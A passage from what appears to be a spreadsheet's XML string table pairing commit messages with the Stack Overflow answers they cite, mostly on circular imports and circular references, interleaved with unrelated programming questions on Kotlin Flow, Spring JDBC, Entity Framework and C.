How can a separate "sub-process" render directly to the UI within the "main process"?  Is this actually what is happening, or as was suggested in comments, does the sub-process use IPC to ask the main process to render for it?
</t>
  </si>
  <si>
    <t>C645</t>
  </si>
  <si>
    <t>fix: error with [https://stackoverflow.com/questions/60749439/circula
r-dependency-with-nestjs-swagger-4]</t>
  </si>
  <si>
    <t>The solution that worked for me was to declare in
@ApiProperty()
the
type
with
arrow function
, like below:
@Entity()
export class Job {
.
.
.
    @ManyToOne(type =&gt; Customer, customer =&gt; customer.jobs)
    @ApiProperty({ type: () =&gt; Customer })
    customer: Customer;
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Please run this example below. It won't show loading message &amp;quot;Result Loading in viewmodel&amp;quot; as it's supposed to be called during Flow.onStart() where Result.Loading is emitted. How can I get Result.Loading state?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;sealed interface Result&amp;lt;out T&amp;gt; {
    data class Success&amp;lt;T&amp;gt;(val data: T) : Result&amp;lt;T&amp;gt;
    data class Error(val exception: Throwable? = null) : Result&amp;lt;Nothing&amp;gt;
    object Loading : Result&amp;lt;Nothing&amp;gt;
}
@OptIn(kotlinx.coroutines.FlowPreview::class)
fun &amp;lt;T&amp;gt; Flow&amp;lt;T&amp;gt;.asResult(): Flow&amp;lt;Result&amp;lt;T&amp;gt;&amp;gt; {
    return this
        .map&amp;lt;T, Result&amp;lt;T&amp;gt;&amp;gt; {
            Result.Success(it)
        }
        .onStart { emit(Result.Loading) }
        .debounce(RETRY_TIME_IN_MILLIS * RETRY_ATTEMPT_COUNT)
        .retryWhen { cause, attempt -&amp;gt;
            if (cause is IOException &amp;amp;&amp;amp; attempt &amp;lt; RETRY_ATTEMPT_COUNT) {
                delay(RETRY_TIME_IN_MILLIS)
                true
            } else {
                false
            }
        }
        .catch { emit(Result.Error(it)) }
}
fun getFlow(): Flow&amp;lt;String&amp;gt;
{
    return flow {
        emit(&amp;quot;first result&amp;quot;)
        delay(1000L)
        emit(&amp;quot;final result&amp;quot;)
        delay(1000L)
        emit(&amp;quot;finished&amp;quot;)
    }
}
fun main(args: Array&amp;lt;String&amp;gt;)
{
    runBlocking {
        val scope = CoroutineScope(Job() + Dispatchers.IO)
        scope.launch {
            getFlow().asResult().collect{
                when(it) {
                    is Result.Loading -&amp;gt; { System.out.println(&amp;quot;Result Loading in viewmodel&amp;quot;) }
                    is Result.Error -&amp;gt; { System.out.println(&amp;quot;Result Error in viewmodel&amp;quot;) }
                    is Result.Success -&amp;gt; { System.out.println(&amp;quot;Result Success in viewmodel value=&amp;quot;+it.data) }
                }
            }
        }.join()
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C646</t>
  </si>
  <si>
    <t>Properly Detect Circular Structures Fixes #31, #28
Properly Detect Circular Structures.
Idea derived from: https://stackoverflow.com/a/55545121/16201934</t>
  </si>
  <si>
    <t>Pulled from
http://blog.vjeux.com/2011/javascript/cyclic-object-detection.html
. One line added to detect where the cycle is. Paste this into the Chrome dev tools:
function isCyclic (obj) {
  var seenObjects = [];
  function detect (obj) {
    if (obj &amp;&amp; typeof obj === 'object') {
      if (seenObjects.indexOf(obj) !== -1) {
        return true;
      }
      seenObjects.push(obj);
      for (var key in obj) {
        if (obj.hasOwnProperty(key) &amp;&amp; detect(obj[key])) {
          console.log(obj, 'cycle at ' + key);
          return true;
        }
      }
    }
    return false;
  }
  return detect(obj);
}
Here's the test:
&gt; a = {}
&gt; b = {}
&gt; a.b = b; b.a = a;
&gt; isCyclic(a)
  Object {a: Object}
   "cycle at a"
  Object {b: Object}
   "cycle at b"
  true</t>
  </si>
  <si>
    <t xml:space="preserve">I have a grid with several thousand rows that can be filtered and sorted. On each row you can click a details button, which will bring you a new page with detailed information about the page. Because this is a button, you can't middle click or right click and open in a new tab. In addition, when clicking back you lose your filters and search results.
To solve this problem, I considered the following: Switch the buttons to links, and when filtering and searching, use get instead of post requests. This way, you could switch to new pages with a right click or middle click, and if you did follow a link normally, back would work properly.
This change was not made however. We were asked add a 'next result / previous result' set of buttons on the details page, that would allow you to navigate. While not an elegant solution, it would at least work.
I proposed adding querystring parameters to the details page, that would regenerate the search query based on filter, and allow you to get the next and previous results in code. 
A team member took issue with this solution. He believes that it is a waste of server resources to re-query the database. Instead, a solution was proposed to add session variable that included a list of results. You could then use that to navigate.
I took issue with that because you can't have multiple tabs open without breaking navigation, and new results aren't appended to the list in real time. Also, if you worried about optimization, session would be the last thing to use since it eats memory and prevents server replication... unless you store the results back in the database.
What's the best solution?
</t>
  </si>
  <si>
    <t>C647</t>
  </si>
  <si>
    <t>Fix circular import
https://stackoverflow.com/questions/7336802/how-to-avoid-circular-imports-in-python/37126790#37126790</t>
  </si>
  <si>
    <t>Only import the module, don't import from the module:
Consider
a.py
:
import b
class A:
    def bar(self):
        return b.B()
and
b.py
:
import a
class B:
    def bar(self):
        return a.A()
This works perfectly fine.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I try to get the file content type from Base64 file String in Java.&lt;/p&gt;
&lt;p&gt;Please find below the code.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.net.URLConnection;
import java.util.Base64;
public class Base64MIMETypeRetriever {
    public static void main(String[] args) {
        String base64String = &amp;quot;SVNBK....&amp;quot;;
        try {
            // Step 1: Decode Base64 string into a byte array
            byte[] decodedBytes = Base64.getDecoder().decode(base64String);
            // Step 2: Create an input stream from the byte array
            ByteArrayInputStream inputStream = new ByteArrayInputStream(decodedBytes);
            // Step 3: Use URLConnection to guess the MIME type
            String mimeType = URLConnection.guessContentTypeFromStream(inputStream);
            // Step 4: Print the MIME type
            System.out.println(&amp;quot;MIME Type: &amp;quot; + mimeType);
        } catch (IOException e) {
            System.err.println(&amp;quot;Error retrieving MIME type: &amp;quot; + e.getMessage());
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The compilation is successful. However, when I execute the code, it returns the output which is given below.&lt;/p&gt;
&lt;p&gt;MIME Type: null&lt;/p&gt;
&lt;p&gt;It did not detect the file content type, I don't know why.&lt;/p&gt;
&lt;p&gt;When I copied the full Base64 string and checked in &lt;a href="https://base64.guru/" rel="nofollow noreferrer"&gt;https://base64.guru/&lt;/a&gt; website, it returns the file content type correctly. (text/plain).&lt;/p&gt;
&lt;p&gt;Could you please check and clarify?&lt;/p&gt;
&lt;p&gt;Output should return file content type since Base64 String is correct.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C648</t>
  </si>
  <si>
    <t>avoid "Circular reference" when DF contains unserializable object (ra
ise TypeError, see: https://stackoverflow.com/a/14251249/4187668)</t>
  </si>
  <si>
    <t>The function you pass as the
default
argument will only be called for objects that are not natively serializable by the
json
module. It must return a serializable object, or raise a TypeError.
Your version returns the same object you were passed if it's not of the one type you're fixing (dates). That is causing the circular reference error (which is misleading, since the circle is between one object and itself after being processed by
date_handler
).
You can start to fix this by changing
date_handler
to raise an exception in its
else
block. That will still probably fail, but you can probably then find out what object it is that is in your data structure causing the problem using code like this:
def date_handler(obj):
    if hasattr(obj, 'isoformat'):
        return obj.isoformat()
    else:
        raise TypeError(
            "Unserializable object {} of type {}".format(obj, type(obj))
        )</t>
  </si>
  <si>
    <t xml:space="preserve">We have a system at my work that is basically a message-driven state machine.  It takes in a variety of types of messages, looks up some context/state based on the message, then decides what to do, based on the message and the current state.  Normally the result is a message being sent out of the system.
Are there any good open-source frameworks for implementing a state machine in .NET?  I've looked into the latest release of Windows Workflow, and it seems like it would be a good option; however, I have some concerns about the default persistence mechanisms (we need to report off the state transition data), testability, and the fact that the WF team is re-architecting the framework as we speak (supposedly).
Instead of WF, I'm thinking of trying to implement a plain-old GoF "State" pattern, and using Spring.NET to wire everything together.  Is there anything out there that already does this, or something similar?
</t>
  </si>
  <si>
    <t>C649</t>
  </si>
  <si>
    <t>continuing refactor
fixed some circular dependencies with foreign keys via https://stackoverflow.com/a/8466752</t>
  </si>
  <si>
    <t>Here is another way to tackle this problem.
Instead of creating a circular dependency, I created an additional table that stores the relationship between players and teams. So in the end it looks like this:
class Team(Model):
    name = CharField(max_length=50)
    def get_captain(self):
        return PlayerRole.objects.get(team=self).player
class Player(Model):
    first_name = CharField(max_length=50)
    last_name = CharField(max_length=50, blank=True)
    def get_team(self):
        return PlayerRole.objects.get(player=self).team
PLAYER_ROLES = (
    ("Regular", "Regular"),
    ("Captain", "Captain")
    )
class PlayerRole(Model):
    player = OneToOneField(Player, primary_key=True)
    team = ForeignKey(Team, null=True)
    role = CharField(max_length=20, choices=PLAYER_ROLES, default=PLAYER_ROLES[0][0])
    class Meta:
        unique_together = ("player", "team")
It might be slightly less efficient in terms of storage than the suggested workaround, but it avoids the circular dependency and keeps the DB structure clean and clear. 
Comments are welcome.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Question:
I am working on a problem where I need to count the number of subsequences of a given password &lt;code&gt;s&lt;/code&gt; that are lexicographically greater than a system-generated password &lt;code&gt;t&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;Problem Statement:&lt;/h3&gt;
&lt;p&gt;Given two strings:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;s&lt;/code&gt;: The customers password.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;t&lt;/code&gt;: The system-generated password.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A subsequence of &lt;code&gt;s&lt;/code&gt; is formed by deleting some (or no) characters from &lt;code&gt;s&lt;/code&gt; without changing their order. We need to count how many subsequences of &lt;code&gt;s&lt;/code&gt; are lexicographically greater than &lt;code&gt;t&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Lexicographical Order:
A string &lt;code&gt;x&lt;/code&gt; is lexicographically greater than &lt;code&gt;y&lt;/code&gt; if:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;x[i] &amp;gt; y[i] at the first position i where they differ, or
x is longer than y and y is a prefix of x.
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Input:&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;s = &amp;quot;aba&amp;quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;t = &amp;quot;ab&amp;quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;All subsequences of &lt;code&gt;s&lt;/code&gt;: &lt;code&gt;[&amp;quot;&amp;quot;, &amp;quot;a&amp;quot;, &amp;quot;b&amp;quot;, &amp;quot;aa&amp;quot;, &amp;quot;ab&amp;quot;, &amp;quot;ba&amp;quot;, &amp;quot;aba&amp;quot;]&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Lexicographically greater subsequences: &lt;code&gt;[&amp;quot;ba&amp;quot;, &amp;quot;b&amp;quot;, &amp;quot;aba&amp;quot;]&lt;/code&gt;&lt;/p&gt;
&lt;h3&gt;Output:&lt;/h3&gt;
&lt;p&gt;3&lt;/p&gt;
&lt;p&gt;The length of &lt;code&gt;s&lt;/code&gt; can be large.
The count should be returned modulo
&lt;code&gt;10^9+7&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C65</t>
  </si>
  <si>
    <t>We use relative import everywhere (in the header), as the absolute import is very verbose to me. Especially when module A and module B are placed very deep in the package layout and then module A needs to import module B. When using relative import, a simple from .B import BClass is sufficient, saving us from over-lengthy full path. In Jina package design, such deep layout is pretty common. Cyclic imports
Jina has a nontrivial package layout. Cyclic module dependencies have been well-thought and solved with the greatest effort, yet they can not be solved completely. The best way to avoid cyclic dependencies is to only import when you need them. Not at the header. https://stackoverflow.com/a/16748366</t>
  </si>
  <si>
    <t>Python relative imports are no longer strongly discouraged, but using absolute_import is strongly suggested in that case.
Please see this discussion citing Guido himself:
"Isn't this mostly historical? Until the new relative-import syntax was implemented there were various problems with relative imports. The short-term solution was to recommend not using them. The long-term solution was to implement an unambiguous syntax. Now it is time to withdraw the anti-recommendation. Of course, without going overboard -- I still find them an acquired taste; but they have their place."
The OP correctly links the PEP 328 that says:
Several use cases were presented, the most important of which is being able to rearrange the structure of large packages without having to edit sub-packages. In addition, a module inside a package can't easily import itself without relative imports.
Also see almost duplicate question https://stackoverflow.com/questions/12738889/when-or-why-to-use-relative-imports-in-python
Of course it still stands as a matter of taste. While it's easier to move code around with relative imports, that might also unexpectedly break things; and renaming the imports is not that difficult.
To force the new behaviour from PEP 328 use:
from __future__ import absolute_import
In this case, implicit relative import will no longer be possible (eg. import localfile will not work anymore, only from . import localfile). For clean and future proof behaviour, using absolute_import is advisable.
An important caveat is that because of  PEP 338 and PEP 366, relative imports require the python file to be imported as a module - you cannot execute a file.py that has a relative import or you'll get a ValueError: Attempted relative import in non-package.
This limitation should be taken into account when evaluating the best approach. Guido is against running scripts from a module in any case:
I'm -1 on this and on any other proposed twiddlings of the __main__ machinery. The only use case seems to be running scripts that happen to be living inside a module's directory, which I've always seen as an antipattern. To make me change my mind you'd have to convince me that it isn't.
Exhaustive discussions on the matter can be found on SO; re. Python 3 this is quite comprehensive:
https://stackoverflow.com/questions/16981921/relative-imports-in-python-3</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using a mix of NamedParameterJdbcTemplate and JdbcTemplate in my Spring API application. I'm working with a transaction and Oracle temp table, and not getting the results I expect.&lt;/p&gt;
&lt;p&gt;In the first batch, I have data, and the batchUpdate Insert returns 4 rows affected. But I turn around and read the table I just inserted into, and get zero record count. (Code comments indicate the results along the way.)&lt;/p&gt;
&lt;p&gt;I insert, then try to read, and the read finds no records. Should the mix of tpl and npTpl be fine inside @Transactional?&lt;/p&gt;
&lt;p&gt;The templates are initialized in a central class:&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;    @Bean
    public JdbcTemplate tpl(DataSource dataSource) {
        return new JdbcTemplate(dataSource);
    }
    @Bean
    public NamedParameterJdbcTemplate npTpl(DataSource dataSource) {
        return new NamedParameterJdbcTemplate(dataSource);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My DAO class starts much like this:&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;@Repository
public class PageDAO extends AbstractDAO&amp;lt;Pageoverview&amp;gt; {
    @Autowired
    private DataSource dataSource;
    @Autowired
    @Qualifier(&amp;quot;npTpl&amp;quot;)
    private NamedParameterJdbcTemplate npTpl;
    @Autowired
    private JdbcTemplate tpl;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and later this is the DAO method executed&lt;/p&gt;
&lt;pre class="lang-java prettyprint-override"&gt;&lt;code&gt;    @Transactional
    public List&amp;lt;List&amp;lt;String&amp;gt;&amp;gt; getData(Map&amp;lt;String, String&amp;gt; parameterMap,
            String storedProcName, Long planId) throws SQLException {
        String sql = &amp;quot;insert into TempParameter (tepaovpaSystemString, tepaovpaValue) values (:systemString, :value)&amp;quot;;
        try {
            MapSqlParameterSource[] batchParams = parameterMap
                    .entrySet().stream().map(entry -&amp;gt; new MapSqlParameterSource()
                            .addValue(&amp;quot;systemString&amp;quot;, entry.getKey()).addValue(&amp;quot;value&amp;quot;, entry.getValue()))
                    .toArray(MapSqlParameterSource[]::new);
            // before run, batchParams = [MapSqlParameterSource {systemString=PARAMSYSTEMSTRING, value=CALCS1}, MapSqlParameterSource {systemString=PLANID, value=33182}, MapSqlParameterSource {systemString=PERIODCODE, value=6226}, MapSqlParameterSource {systemString=PLEMID, value=-99}]
            int[] batchResult = npTpl.batchUpdate(sql, batchParams);
            // after run, batchResult = [1, 1, 1, 1]
            int resultTest = 0;
            try {
                Integer columnCount = tpl.queryForObject(&amp;quot;select count(*) from TempParameter&amp;quot;, Integer.class);
                resultTest = columnCount;
                // after run, columnCount = 0
             } catch (Exception e) {
                log.error(&amp;quot;Error retrieving column count&amp;quot;, e);
            }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C650</t>
  </si>
  <si>
    <t>conditionally import types to avoid circular dependence
c.f. https://stackoverflow.com/a/39757388</t>
  </si>
  <si>
    <t>There isn't a hugely elegant way to handle import cycles in general, I'm afraid. Your choices are to either redesign your code to remove the cyclic dependency, or if it isn't feasible, do something like this:
# some_file.py
from typing import TYPE_CHECKING
if TYPE_CHECKING:
    from main import Main
class MyObject(object):
    def func2(self, some_param: 'Main'):
        ...
The
TYPE_CHECKING
constant is always
False
at runtime, so the import won't be evaluated, but mypy (and other type-checking tools) will evaluate the contents of that block.
We also need to make the
Main
type annotation into a string, effectively forward declaring it since the
Main
symbol isn't available at runtime.
If you are using Python 3.7+, we can at least skip having to provide an explicit string annotation by taking advantage of
PEP 563
:
# some_file.py
from __future__ import annotations
from typing import TYPE_CHECKING
if TYPE_CHECKING:
    from main import Main
class MyObject(object):
    # Hooray, cleaner annotations!
    def func2(self, some_param: Main):
        ...
The
from __future__ import annotations
import will make
all
type hints be strings and skip evaluating them. This can help make our code here mildly more ergonomic.
All that said, using mixins with mypy will likely require a bit more structure then you currently have. Mypy
recommends an approach
that's basically what
deceze
is describing -- to create an ABC that both your
Main
and
MyMixin
classes inherit. I wouldn't be surprised if you ended up needing to do something similar in order to make Pycharm's checker happy.</t>
  </si>
  <si>
    <t xml:space="preserve">I have a web application based on the [external-link] framework. It actually use NHibernate for the dal, and i've added a service layer between the (VIEW-CONTROLLER) and the DAL.
I actually need to implement a scheduler to run my jobs frequently. I will use Quartz.net to do that task. Actually i'm facing a problem. Because I will have lot's of jobs that will run at different schedule, like every 30 sec, every days, every weeks.
I want to know if there is a way to run NHibernate with service injection inside Quartz, and if it will support job concurrence, I mean if two jobs runs simultaniously, if there will be no problems with NHibernate. I know there is some issue with NHibernate and multithreading.
I found an implementation of Quartz.Net for Spring ([external-link]) and an implementation for Castle-Windsor ([external-link]).
The problem is, I think this examples don't take care of the case that jobs can be ran simultaniously, that's an Nhibernate problem. And i want to use CommonServiceLocator to be more high level and not limit myself to one IoC framework.
What can be the best approach to solve this problem ?
Thanks for your help
</t>
  </si>
  <si>
    <t>C651</t>
  </si>
  <si>
    <t>Specifies UTC offset in time, reuses Time object for Timecop, downcases and properly formats http headers
HTTP headers are case insensitive.
Source:
http://stackoverflow.com/questions/5258977/are-http-headers-case-sensitive</t>
  </si>
  <si>
    <t>Header names are not case sensitive.
From
RFC 2616 - "Hypertext Transfer Protocol -- HTTP/1.1"
,
Section 4.2, "Message Headers"
:
Each header field consists of a name followed by a colon (":") and the field value. Field names are case-
in
sensitive.
The updating  RFC 7230 does not list any
changes from RFC 2616
at this part.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know there are a ton of QAs on this topic but none of the answers I've looked at have helped me. I'm sure it's something simple.&lt;/p&gt;
&lt;p&gt;I am in the process of moving from database-first to code-first using an existing database. I've used the &amp;quot;code first from database&amp;quot; tool to produce the classes but am trying to resolve some errors, this one has me stumped.&lt;/p&gt;
&lt;p&gt;The classes (with unrelated properties removed from &lt;code&gt;Contact&lt;/code&gt;) involved in the issue are:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public partial class Contact
{
    [System.Diagnostics.CodeAnalysis.SuppressMessage(&amp;quot;Microsoft.Usage&amp;quot;, &amp;quot;CA2214:DoNotCallOverridableMethodsInConstructors&amp;quot;)]
    public Contact()
    {
        Contact_Category_Pivot = new HashSet&amp;lt;Contact_Category_Pivot&amp;gt;();
    }
    [Key]
    [Column(&amp;quot;Contact ID&amp;quot;)]
    public int Contact_ID { get; set; }
    [Column(&amp;quot;Contact Name&amp;quot;)]
    [StringLength(255)]
    public string Contact_Name { get; set; }
    [System.Diagnostics.CodeAnalysis.SuppressMessage(&amp;quot;Microsoft.Usage&amp;quot;, &amp;quot;CA2227:CollectionPropertiesShouldBeReadOnly&amp;quot;)]
    public virtual ICollection&amp;lt;Contact_Category_Pivot&amp;gt; Contact_Category_Pivot { get; set; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;Contact_Category&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public partial class Contact_Category
{
    [System.Diagnostics.CodeAnalysis.SuppressMessage(&amp;quot;Microsoft.Usage&amp;quot;, &amp;quot;CA2214:DoNotCallOverridableMethodsInConstructors&amp;quot;)]
    public Contact_Category()
    {
        Contact_Category_Pivot = new HashSet&amp;lt;Contact_Category_Pivot&amp;gt;();
    }
    [Key]
    public Guid Contact_Category_ID { get; set; }
    [Required]
    [StringLength(50)]
    public string Contact_Category_Name { get; set; }
    [Required]
    [StringLength(100)]
    public string Contact_Category_Description { get; set; }
    public int Sequence { get; set; }
    [System.Diagnostics.CodeAnalysis.SuppressMessage(&amp;quot;Microsoft.Usage&amp;quot;, &amp;quot;CA2227:CollectionPropertiesShouldBeReadOnly&amp;quot;)]
   public virtual ICollection&amp;lt;Contact_Category_Pivot&amp;gt; Contact_Category_Pivot { get; set; 
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;Contact_Category_Pivot&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public partial class Contact_Category_Pivot
{
    [Column(&amp;quot;ID&amp;quot;)]
    [Key]
    public Guid PivotID { get; set; }
    [Column(&amp;quot;Contact_ID&amp;quot;)]
    public int Contact_ID { get; set; }
    public Guid Contact_Category_ID { get; set; }
    public Contact Contact { get; set; }
    public Contact_Category Contact_Category { get; set; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;OnModelCreating&lt;/code&gt; method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;modelBuilder.Entity&amp;lt;Contact&amp;gt;()
     .HasMany(e =&amp;gt; e.Contact_Category_Pivot)
     .WithRequired(e =&amp;gt; e.Contact)
     .HasForeignKey(e =&amp;gt; e.Contact_ID);
modelBuilder.Entity&amp;lt;Contact_Category&amp;gt;()
     .HasMany(e =&amp;gt; e.Contact_Category_Pivot)
     .WithRequired(e =&amp;gt; e.Contact_Category)
     .WillCascadeOnDelete(false);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In case it is unclear; the pivot table holds a key from each other table plus an ID per record (&lt;code&gt;RecordID, ContactID, ContactCategoryID&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;If I've missed any required samples, do let me know.&lt;/p&gt;
&lt;p&gt;The error occurs when attempting to find the &amp;quot;Contact Category&amp;quot; using the &lt;code&gt;CategoryID&lt;/code&gt; sourced from the pivot table (for troubleshooting purposes, I have hardcoded the id here):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Contact_Category CG = db.Contact_Category.Find(new Guid(&amp;quot;a2ab17df-5a15-4b38-aa5f-4577653a1ec9&amp;quot;));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On that line, I get an error&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Invalid column name error on Contact_Contact_ID&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I know the problem is related to the foreign key relationship, I'm just not sure what I need to do to resolve it.&lt;/p&gt;
&lt;p&gt;I've tried various changes based on answers I've seen but each seems to create a new problem, so I've had to resort to requesting assistance from all you wonderful folk! Hopefully someone spots something obvious to those more experienced with code-first EF!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: I believe the supplied samples are all auto-generated but it is possible changes from my tinkering have slipped in&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Bonus&lt;/strong&gt;: once I have this sorted, I need to figure out how to do the initial-migration step accounting for these changes, so if anyone can point me in the right direction for that if its likely to be an issue, that would also be appreciated&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;
Contact has several other relations not defined above. If I load a record which uses ONLY a contact record it works, but as soon as I try to access any relation - even indirect relations like that Contact_Category table (which is linked via the pivot table), I receive the error.&lt;/p&gt;
&lt;p&gt;Answering comments: all the properties of Contact_Categories &amp;amp; Contact_Category_Pivot are included above, I've only removed extra properties from Contact because it has a ton of columns.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C652</t>
  </si>
  <si>
    <t>Remove circular imports from Haystack signal processor
See http://stackoverflow.com/a/17364366/386210</t>
  </si>
  <si>
    <t>I don't use gunicorn, but I had the same problem when I used the HAYSTACK_SIGNAL_PROCESSOR setting to point to a custom class that I wrote.  That class imported one of my models, which eventually propagated up the import chain, to import my settings module, thus causing a circular import.
When using a setting such as HAYSTACK_SIGNAL_PROCESSOR that points to a class, make sure that class standsalone, and doesn't import either directly or indirectly the Django settings file.</t>
  </si>
  <si>
    <t xml:space="preserve">Like anything else understanding the words makes it much easier to learn the language.  Can anyone chime in with all the words used in unit testing with their definitions (ex. Mock, Fixture, etc. )
</t>
  </si>
  <si>
    <t>C653</t>
  </si>
  <si>
    <t>Removing circular dependencies, fullname import from, remove try in i
mport
https://stackoverflow.com/questions/10113383/handle-circular-dependencies-in-python-modules</t>
  </si>
  <si>
    <t>I thought I'd expand this into an answer instead of a comment.
It's worth noting that
circular imports are generally a sign of bad design
: instead of demanding the language suit your design, why not change that design?
There are
ways around this problem in python
:
The good option: Refactor your code not to use circular imports.
The bad option: Move one of your
import
statements to a different scope.
But no, you can't pre-parse files. That's not the way Python works, and if you look into how Python works, it's pretty obvious why.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to define some variables and use them in .dox and plantuml in .dox. Is it possible to do that?&lt;/p&gt;
&lt;p&gt;Currently, I defined the same variable at both places, Doxyfile and .pu to use the variable in .dox and plantuml in .dox. It is working but double work.&lt;/p&gt;
&lt;p&gt;doxygen version: 1.10.0 (ebc57c6dd303a980bd19dd74b8b61c8f3f5180ca)&lt;/p&gt;
&lt;p&gt;Example:&lt;/p&gt;
&lt;p&gt;By adding &lt;code&gt;ALIASES += CommInterface=&amp;quot;I2C&amp;quot;&lt;/code&gt; in doxyfile, I can use the variable by &lt;code&gt;\CommInterface&lt;/code&gt; in a.dox.&lt;/p&gt;
&lt;p&gt;I can also define a variable in config.pu by &lt;code&gt;!$CommInterface = &amp;quot;I2C&amp;quot;&lt;/code&gt;. Then I can use the variable in the plantuml in a.dox.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@startuml
!includesub config.pu!Config
$CommInterface
@enduml
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C654</t>
  </si>
  <si>
    <t>change from relative import to absolute import and figured out the ci
rcular import in Python
see detail in my OneNote and also https://stackoverflow.com/questions/22187279/python-circular-importing</t>
  </si>
  <si>
    <t>I think the answer by jpmc26, while by no means wrong, comes down too heavily on circular imports. They can work just fine, if you set them up correctly.
The easiest way to do so is to use import my_module syntax, rather than from my_module import some_object. The former will almost always work, even if my_module included imports us back. The latter only works if my_object is already defined in my_module, which in a circular import may not be the case.
To be specific to your case: Try changing entities/post.py to do import physics and then refer to physics.PostBody rather than just PostBody directly. Similarly, change physics.py to do import entities.post and then use entities.post.Post rather than just Post.</t>
  </si>
  <si>
    <t xml:space="preserve">I was wondering if anyone can compare/contrast the differences between frontend, backend, and middleware ("middle-end"?) succinctly.
Are there cases where they overlap?
Are there cases where they MUST overlap, and frontend/backend cannot be separated?
In terms of bottlenecks, which end is associated with which type of bottlenecks?
</t>
  </si>
  <si>
    <t>C655</t>
  </si>
  <si>
    <t>Fixed json stringifying with circular object references.
Errors caught via domains exhibit this issue.
http://stackoverflow.com/questions/11616630/json-stringify-avoid-typeerror-converting-circular-structure-to-json</t>
  </si>
  <si>
    <t>In Node.js, you can use util.inspect(object). It automatically replaces circular links with "[Circular]".
Albeit being built-in (no installation is required), you must import it
import * as util from 'util' // has no default export
import { inspect } from 'util' // or directly
// or 
var util = require('util')
To use it, simply call
console.log(util.inspect(myObject))
Also be aware that you can pass options object to inspect (see link above)
inspect(myObject[, options: {showHidden, depth, colors, showProxy, ...moreOptions}])
Please, read and give kudos to commenters below...</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I assume the issue that I am having is in the main function, the other functions are present for compilation's sake. When reorganizing the scoreboard array, the for-loop's index's change value without assignment. Specifically I am curious why x changes from 9 to 1 in the output, and i changes from 8 to 1852797506&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
struct player
  {
  int score;
  char name[20];
  };
void initializeArray(char *name, int arrayLength)
  {
  int i = 0;
  for(i; i &amp;lt; arrayLength; i++)
    {
    name[i] = '-';
    }
    name[i - 1] = '\0';
  }
  void initializeStruct(struct player *players)
  {
    players-&amp;gt;score = 0;
    initializeArray(players-&amp;gt;name, 20);
  }
  void fillStruct(struct player *players)
  {
  char names[9][20] = {&amp;quot;James&amp;quot;, &amp;quot;Johnny&amp;quot;, &amp;quot;Johnathan&amp;quot;, &amp;quot;Ethan&amp;quot;, &amp;quot;Robby&amp;quot;, &amp;quot;Anthony&amp;quot;, &amp;quot;Jeremy&amp;quot;, &amp;quot;Scott&amp;quot;, &amp;quot;Bronwyn&amp;quot;};
  int x = 9;
  for(int i = 0; i &amp;lt; 9; i++)
    {
    strcpy(players[i].name, names[i]);
    players[i].score = x - i;
    }
  }
  int main()
  {
    struct player players[9];
    initializeStruct(players);
    fillStruct(players);
    struct player one;
    one.score = 2;
    initializeArray(one.name, 20);
    strcpy(one.name, &amp;quot;Mathew&amp;quot;);
    for(int i = 0; i &amp;lt; 9; i++)  
    {
      if(one.score &amp;gt; players[i].score)
      {
        for(int x = 8; x &amp;gt;= i; x--)
        {
          printf(&amp;quot;x = %d i = %d\n&amp;quot;, x, i);
          strcpy(players[x].name, players[x  - 1].name);
          printf(&amp;quot;x = %d i = %d\n&amp;quot;, x, i);
